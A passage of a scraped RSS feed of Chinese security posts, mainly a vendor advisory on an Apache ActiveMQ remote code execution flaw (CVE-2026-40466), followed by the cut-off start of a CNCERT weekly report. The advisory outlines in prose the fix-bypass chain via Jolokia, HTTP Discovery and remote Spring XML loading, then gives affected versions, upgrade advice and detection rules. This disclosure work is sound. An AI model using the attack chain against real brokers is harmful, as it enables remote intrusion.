HTTP模块在类路径上，则经过身份验证的攻击者可以通过BrokerView.addNetworkConnector或BrokerView.addConnector通过Jolokia使用HTTP Discovery传输添加连接器，从而绕过CVE-2026-34197中的修复。恶意HTTP端点可以通过HTTP URI返回VM传输，这将绕过CVE-2026-34197中添加的验证。然后，攻击者可以使用VM传输的BrokerConfig参数来使用ResourceXmlApplicationContext加载远程Spring XML应用程序上下文。</span></span></strong></p></div><div style="display: flex;flex-flow: row;margin: 50px 0% 10px;text-align: center;justify-content: center;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;background-color: rgb(229, 240, 247);flex: 0 0 auto;align-self: flex-start;min-width: 10%;max-width: 100%;height: auto;box-shadow: rgb(0, 0, 0) 0px 0px 0px;box-sizing: border-box;"><div style="transform: translate3d(4px, 0px, 0px);-webkit-transform: translate3d(4px, 0px, 0px);-moz-transform: translate3d(4px, 0px, 0px);-o-transform: translate3d(4px, 0px, 0px);margin: 6px 0%;box-sizing: border-box;"><div style="padding: 0px 17px;color: rgb(13, 74, 182);text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">影响范围</span></strong></p></div></div></div></div><div style="margin: 25px 0%;box-sizing: border-box;"><div style="font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">目前受影响的Apache ActiveMQ版本：</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Apache ActiveMQ &lt; 5.19.6</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">6.0.0 ≤ Apache ActiveMQ &lt; 6.2.5</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Apache ActiveMQ Broker &lt; 5.19.6</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">6.0.0 ≤ Apache ActiveMQ Broker &lt; 6.2.5</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Apache ActiveMQ All &lt; 5.19.6</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">6.0.0 ≤ Apache ActiveMQ All &lt; 6.2.5</span></p></div></div><div style="display: flex;flex-flow: row;margin: 50px 0% 10px;text-align: center;justify-content: center;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;background-color: rgb(229, 240, 247);flex: 0 0 auto;align-self: flex-start;min-width: 10%;max-width: 100%;height: auto;box-shadow: rgb(0, 0, 0) 0px 0px 0px;box-sizing: border-box;"><div style="transform: translate3d(4px, 0px, 0px);-webkit-transform: translate3d(4px, 0px, 0px);-moz-transform: translate3d(4px, 0px, 0px);-o-transform: translate3d(4px, 0px, 0px);margin: 6px 0%;box-sizing: border-box;"><div style="padding: 0px 17px;color: rgb(13, 74, 182);text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">解决方案</span></strong></p></div></div></div></div><div style="display: flex;flex-flow: row;margin: 50px 0% 10px;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 0 0 0%;align-self: center;height: auto;margin: 0px 0px 0px -12px;box-sizing: border-box;"><div style="transform: rotateZ(90deg);-webkit-transform: rotateZ(90deg);-moz-transform: rotateZ(90deg);-o-transform: rotateZ(90deg);box-sizing: border-box;"><div style="display: flex;flex-flow: row;text-align: center;justify-content: center;margin: 0px 0%;box-sizing: border-box;"><div style="display: inline-block;width: 28px;vertical-align: top;background-color: rgb(102, 188, 41);flex: 0 0 auto;height: auto;line-height: 0;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;width: 100%;height: auto;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.1503267973856209" data-s="300,640" data-type="gif" data-w="306" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100041756" src="https://wechat2rss.xlab.app/img-proxy/?k=ee91145b&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_gif%2FAPc6NwjLsxQiaGJzYUWXbWUesuAUbYHAG8VDBLibjKibIQcVSyKA7L5Gb6Amn7MzGgpGCMhmP2SAH9x3NaHVPdibIcqNH4E0wxtYG3hNYib3kMXw%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div></div></div></div></div><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="margin: 0px 0%;box-sizing: border-box;"><div style="color: rgb(13, 74, 182);letter-spacing: 1px;line-height: 1.5;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">官方修复建议</span></strong></p></div></div></div></div><div style="font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">官方已发布最新版本修复该漏洞，建议受影响用户将Apache ActiveMQ升级到最新版本。</span><span leaf=""><br/></span><span leaf="">下载链接：<a href="https://activemq.apache.org/download.html" target="_blank">https://activemq.apache.org/download.html</a></span></p></div><div style="display: flex;flex-flow: row;margin: 50px 0% 10px;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 0 0 0%;align-self: center;height: auto;margin: 0px 0px 0px -12px;box-sizing: border-box;"><div style="transform: rotateZ(90deg);-webkit-transform: rotateZ(90deg);-moz-transform: rotateZ(90deg);-o-transform: rotateZ(90deg);box-sizing: border-box;"><div style="display: flex;flex-flow: row;text-align: center;justify-content: center;margin: 0px 0%;box-sizing: border-box;"><div style="display: inline-block;width: 28px;vertical-align: top;background-color: rgb(102, 188, 41);flex: 0 0 auto;height: auto;line-height: 0;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;width: 100%;height: auto;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.1503267973856209" data-s="300,640" data-type="gif" data-w="306" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100041757" src="https://wechat2rss.xlab.app/img-proxy/?k=5f84c49c&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_gif%2FAPc6NwjLsxQNHlQeJFFltuCiaSKYR5lAIqFy6nMab8lvU6qttul1iaa6crffXGx8oCXh3O3RiaemDBDFOzI9esyhmuOLbhBFlAvfNNWBg1RXLk%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div></div></div></div></div><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="margin: 0px 0%;box-sizing: border-box;"><div style="color: rgb(13, 74, 182);letter-spacing: 1px;line-height: 1.5;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">临时修复建议</span></span></strong></p></div></div></div></div><p style="font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;"><ul style="list-style-type: disc;" class="list-paddingleft-1"><li><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">关闭未使用的功能模块，减少潜在攻击入口。</span></p></li></ul><ul style="list-style-type: disc;" class="list-paddingleft-1"><li><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">遵循最小权限原则，严控各类敏感操作权限范围。</span></p></li></ul><ul style="list-style-type: disc;" class="list-paddingleft-1"><li><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">非必要不暴露服务到公网，限制访问源为可信范围。</span></p></li></ul><ul style="list-style-type: disc;" class="list-paddingleft-1"><li><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">定期更新系统及各类组件至安全版本，及时修补已知隐患。</span></p></li></ul></p><div style="display: flex;flex-flow: row;margin: 50px 0% 10px;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 0 0 0%;align-self: center;height: auto;margin: 0px 0px 0px -12px;box-sizing: border-box;"><div style="transform: rotateZ(90deg);-webkit-transform: rotateZ(90deg);-moz-transform: rotateZ(90deg);-o-transform: rotateZ(90deg);box-sizing: border-box;"><div style="display: flex;flex-flow: row;text-align: center;justify-content: center;margin: 0px 0%;box-sizing: border-box;"><div style="display: inline-block;width: 28px;vertical-align: top;background-color: rgb(102, 188, 41);flex: 0 0 auto;height: auto;line-height: 0;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;width: 100%;height: auto;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.1503267973856209" data-s="300,640" data-type="gif" data-w="306" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100041760" src="https://wechat2rss.xlab.app/img-proxy/?k=3b2a0ef1&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_gif%2FAPc6NwjLsxTsS0eVuF69sBUqU1ibY35UciaPiahqiaKspFI1AV1FPn6ibKK7KjWNypPblfic080k0SRiaVOZNHDBeNYwCQ9KmtJDg5tIUvjDs6m6kU%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div></div></div></div></div><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="margin: 0px 0%;box-sizing: border-box;"><div style="color: rgb(13, 74, 182);letter-spacing: 1px;line-height: 1.5;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">深信服解决方案</span></strong></p></div></div></div></div><div style="font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">1、风险资产发现</span></strong></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">支持对Apache ActiveMQ的主动检测，</span><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">可批量检出业务场景中该事件的受影响资产情况，</span></span></strong><span leaf="">相关产品如下：</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">【深信服云镜YJ】</span></span></strong><span leaf=""> 已发布资产检测方案，指纹ID:0007260。</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">【深信服漏洞评估工具TSS】</span></span></strong><span leaf="">已发布资产检测方案，指纹ID:0007260。</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">2、漏洞主动检测</span></strong></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">支持对Apache ActiveMQ 远程代码执行漏洞(CVE-2026-40466)的主动检测，</span><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">可批量快速检出业务场景中是否存在漏洞风险，</span></span></strong><span leaf="">相关产品如下：</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">【深信服云镜YJ】</span></span></strong><span leaf="">预计2026年04月26日发布检测方案，规则ID:SF-2026-00904。</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">【深信服漏洞评估工具TSS】</span></span></strong><span leaf="">预计2026年05月30日发布检测方案，规则ID:SF-2026-01015。</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">【深信服安全托管服务MSS】</span></span></strong><span leaf="">预计2026年05月30日发布检测方案（需要具备TSS组件能力），规则ID:SF-2026-01015。</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">【深信服可拓展检测响应平台XDR】</span></span></strong><span leaf="">预计2026年04月26日发布检测方案（需要具备云镜组件能力），规则ID:SF-2026-00904。</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">3、漏洞安全监测</span></strong></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">支持对Apache ActiveMQ 远程代码执行漏洞(CVE-2026-40466)的监测，</span><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">可依据流量收集实时监控业务场景中的受影响资产情况，快速检查受影响范围，</span></span></strong><span leaf="">相关产品及服务如下：</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">【深信服安全感知管理平台SIP】</span></span></strong><span leaf="">预计2026年05月08日发布监测方案，规则ID:11220422。</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">【深信服安全托管服务MSS】</span></span></strong><span leaf="">预计2026年05月08日发布监测方案（需要具备SIP组件能力），规则ID:11220422。</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">【深信服可拓展检测响应平台XDR】</span></span></strong><span leaf="">预计2026年05月08日发布监测方案，规则ID:11220422。</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">4、漏洞安全防护</span></strong></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">支持对Apache ActiveMQ 远程代码执行漏洞(CVE-2026-40466)的防御，</span><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">可阻断攻击者针对该事件的入侵行为，</span></span></strong><span leaf="">相关产品及服务如下：</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">【深信服下一代防火墙AF】</span></span></strong><span leaf="">预计2026年05月08日发布防护方案，规则ID:11220422。</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">【深信服Web应用防火墙WAF】</span></span></strong><span leaf="">预计2026年05月08日发布防护方案，规则ID:11220422。</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">【深信服安全托管服务MSS】</span></span></strong><span leaf="">预计2026年05月08日发布防护方案（需要具备AF组件能力），规则ID:11220422。</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">【深信服可拓展检测响应平台XDR】</span></span></strong><span leaf="">预计2026年05月08日发布防护方案（需要具备AF组件能力），规则ID:11220422。</span></p></div><div style="display: flex;flex-flow: row;margin: 50px 0% 10px;text-align: center;justify-content: center;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;background-color: rgb(229, 240, 247);flex: 0 0 auto;align-self: flex-start;min-width: 10%;max-width: 100%;height: auto;box-shadow: rgb(0, 0, 0) 0px 0px 0px;box-sizing: border-box;"><div style="transform: translate3d(4px, 0px, 0px);-webkit-transform: translate3d(4px, 0px, 0px);-moz-transform: translate3d(4px, 0px, 0px);-o-transform: translate3d(4px, 0px, 0px);margin: 6px 0%;box-sizing: border-box;"><div style="padding: 0px 17px;color: rgb(13, 74, 182);text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><b style="box-sizing: border-box;"><span leaf="">参考链接</span></b></p></div></div></div></div><div style="font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://seclists.org/oss-sec/2026/q2/207" target="_blank">https://seclists.org/oss-sec/2026/q2/207</a></span></p></div><div style="display: flex;flex-flow: row;margin: 50px 0% 10px;text-align: center;justify-content: center;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;background-color: rgb(229, 240, 247);flex: 0 0 auto;align-self: flex-start;min-width: 10%;max-width: 100%;height: auto;box-shadow: rgb(0, 0, 0) 0px 0px 0px;box-sizing: border-box;"><div style="transform: translate3d(4px, 0px, 0px);-webkit-transform: translate3d(4px, 0px, 0px);-moz-transform: translate3d(4px, 0px, 0px);-o-transform: translate3d(4px, 0px, 0px);margin: 6px 0%;box-sizing: border-box;"><div style="padding: 0px 17px;font-size: 17px;color: rgb(13, 74, 182);text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><b style="box-sizing: border-box;"><span leaf="">时间轴</span></b></p></div></div></div></div><div style="text-align: left;justify-content: flex-start;margin: 10px 0%;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;box-sizing: border-box;"><div style="margin: 0px 0%;box-sizing: border-box;"><div style="padding: 0px 6px;text-align: center;color: rgb(56, 52, 52);letter-spacing: 1px;line-height: 1;box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">2026/04/24</span></strong></p></div></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;width: auto;vertical-align: top;box-shadow: rgb(102, 188, 41) 0px 0px 0px;border-left: 2px dotted rgb(102, 188, 41);border-bottom-left-radius: 0px;flex: 100 100 0%;align-self: flex-start;height: auto;margin: 0px 6px 0px 12px;padding: 9px 16px 20px 24px;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(102, 102, 102);text-align: justify;letter-spacing: 1px;line-height: 1.6;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">深瞳漏洞实验室监测到Apache ActiveMQ 远程代码执行漏洞信息。</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;margin: 10px 0%;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;box-sizing: border-box;"><div style="margin: 0px 0%;box-sizing: border-box;"><div style="padding: 0px 6px;text-align: center;color: rgb(56, 52, 52);letter-spacing: 1px;line-height: 1;box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">2026/04/24</span></strong></p></div></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;width: auto;vertical-align: top;box-shadow: rgb(102, 188, 41) 0px 0px 0px;border-left: 2px dotted rgb(102, 188, 41);border-bottom-left-radius: 0px;flex: 100 100 0%;align-self: flex-start;height: auto;margin: 0px 6px 0px 12px;padding: 9px 16px 20px 24px;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(102, 102, 102);text-align: justify;letter-spacing: 1px;line-height: 1.6;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">深瞳漏洞实验室发布漏洞通告。</span></p></div></div></div><div style="text-align: unset;font-size: 15px;box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">点击</span><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">阅读原文</span></span></strong><span leaf="">，及时关注并登录深信服</span><strong style="box-sizing: border-box;"><span leaf="">智安全平台</span></strong><span leaf="">，可轻松查询漏洞相关解决方案。</span></p><p style="text-align: center;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.5" data-s="300,640" data-type="png" data-w="1912" type="block" data-imgfileid="100041754" src="https://wechat2rss.xlab.app/img-proxy/?k=56129297&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FAPc6NwjLsxS7Q83Yvz2B1pf0x2xnOLJcaiaxm5kFQEUysLPGuVuU2xzgRRDehu3pQJw3ib7Y3MAruf4CCLibu5LCtxT2VlGsia6lj432kEIeuPU%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p style="text-align: center;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.4" data-s="300,640" data-type="jpeg" data-w="1280" type="block" data-imgfileid="100039351" src="https://wechat2rss.xlab.app/img-proxy/?k=ca59cfa2&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2Fw8NHw6tcQ5zvcIHbwGGYKbqDVYsVKzNNia1jYtHf49C7133AlDXAgex2W4lFvpia56tjQQDkiauNBrl08YbxqG01A%2F640%3Fwx_fmt%3Djpeg%26from%3Dappmsg"/></p></div></div><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>


<p><a href="https://sec.sangfor.com.cn/security-vulnerability/detail?vuln_sfv=SF_2026_16313%5cx26amp;lang=ZH-CN">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=f9ddca42&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzg2NjgzNjA5NQ%3D%3D%26mid%3D2247525409%26idx%3D3%26sn%3D7d8ac68421247c6192fa11298fc0c3eb">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Fri, 24 Apr 2026 20:29:00 +0800</pubDate>
    </item>
    <item>
      <title>网络安全信息与动态周报2026年第16期（4月13日-4月19日）</title>
      <link>https://mp.weixin.qq.com/s?__biz=Mzg2NjgzNjA5NQ==&amp;mid=2247525409&amp;idx=4&amp;sn=44e552e0b424ae3cdd85d3563499791a</link>
      <description>分享一篇文章。</description>
      <content:encoded><![CDATA[<p><span>深信服千里目安全技术中心</span> <span>2026-04-24 20:29</span> <span style="display: inline-block;">北京</span></p>


  <p>分享一篇文章。</p>
  <p><strong>国家互联网应急中心CNCERT</strong>: <a href="http://mp.weixin.qq.com/s?__biz=MzIwNDk0MDgxMw%3D%3D&amp;mid=2247501491&amp;idx=1&amp;sn=a6e040484ce7882bf47d50987410bfe4&amp;scene=45#wechat_redirect">网络安全信息与动态周报2026年第16期（4月13日-4月19日）</a></p>





  
  <p><img src="https://wechat2rss.xlab.app/img-proxy/?k=99ed1dd3&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2F1HvTteAHz64B9FXg7TWqjibgFkZTpMg6I2icBfQbxvrJwCxribRnq08fcTYO7C71LnU0fv0KCLz8gswV7SiaL3Qic1g%2F0%3Fwx_fmt%3Djpeg"/></p>
  <p>本周，互联网网络安全态势整体评价为良。</p>
  <div style="margin-bottom: 0px;outline: 0px;white-space: normal;color: rgb(0, 0, 0);font-size: medium;text-align: start;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.48px;background-color: rgb(255, 255, 255);visibility: visible;"><div style="margin-top: 10px;margin-bottom: 10px;outline: 0px;visibility: visible;"><div style="outline: 0px;background-image: -webkit-linear-gradient(left, rgb(30, 155, 232), rgb(255, 255, 255));background-color: rgb(30, 155, 232);visibility: visible;"><div style="padding: 10px;outline: 0px;border-width: 0px 0px 0px 10px;border-style: solid;border-left-color: rgb(252, 180, 43);display: inline-block;visibility: visible;"><div style="outline: 0px;color: rgb(255, 255, 255);visibility: visible;"><p style="outline: 0px;font-size: 16px;visibility: visible;"><span style="outline: 0px;font-size: 15px;visibility: visible;"><span leaf="">本周网络安全基本态势</span></span></p></div></div></div></div></div><p style="margin-bottom: 5px;outline: 0px;white-space: normal;color: rgb(0, 0, 0);font-size: medium;text-align: justify;background-color: rgb(255, 255, 255);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;text-indent: 2em;letter-spacing: 0.54px;visibility: visible;"><span style="outline: 0px;color: rgb(0, 128, 255);font-size: 14px;letter-spacing: 0.54px;text-indent: 2em;visibility: visible;"><span leaf="">本周，互联网网络安全态势整体评价为良。我国互联网基础设施运行整体平稳，全国范围或省级行政区域内未发生造成重大影响的基础设施运行安全事件。针对政府、企业以及广大互联网用户的主要安全威胁来自于软件高危漏洞、恶意代码传播以及网站攻击。</span></span></p><p style="text-align: center;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="1.1096296296296295" data-s="300,640" data-type="png" data-w="675" type="block" data-imgfileid="100017825" src="https://wechat2rss.xlab.app/img-proxy/?k=a289403a&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FaoXpXT1UJRjeEsy00kX21WKVU05OTDCHLeLIasw6AsNWL54OEz0sdo5VNuBztm1yVr1f8cD6jRlXpOZeHk2bs4UyfvgrqPNKP6ibYWuWg0Q8%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p style="text-align: center;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="1.0992592592592592" data-s="300,640" data-type="png" data-w="675" type="block" data-imgfileid="100017820" src="https://wechat2rss.xlab.app/img-proxy/?k=c03d63ff&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FaoXpXT1UJRgEs62dR5PiaJkPb4krt75WyfIwC6bPcLaH07tyiaK8EjWSCjJIwqmM9q1hkp6fPKg1VG5Cz7D4SnzwjZ0ObfoN5ypoqkYYLF9eY%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p style="text-align: center;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.5893648449039882" data-s="300,640" data-type="png" data-w="677" type="block" data-imgfileid="100017826" src="https://wechat2rss.xlab.app/img-proxy/?k=64fc7d1e&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FaoXpXT1UJRgr5mKFF3icV8200BYIicGnicqh9lA5zicZSUPwg3Lo72Z0mlrOE40q7BWRJqe0Y7bjXA9hw9Afibzju1OvjSMv0tiaICMKtDDMAu41s%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p style="text-align: center;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.44281524926686217" data-s="300,640" data-type="png" data-w="682" type="block" data-imgfileid="100017832" src="https://wechat2rss.xlab.app/img-proxy/?k=dd5995ac&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FaoXpXT1UJRhribsoVIAOJ7QnXccTqGYibGjowrImCyrsQICm9sO1SEUjV9PHg5vwjaKh6UpsdGVyZbCBeU0Cjiaza1jxJDjL57TUfT4wcnkHia4%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p style="text-align: center;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="1.2401129943502824" data-s="300,640" data-type="png" data-w="708" type="block" data-imgfileid="100017842" 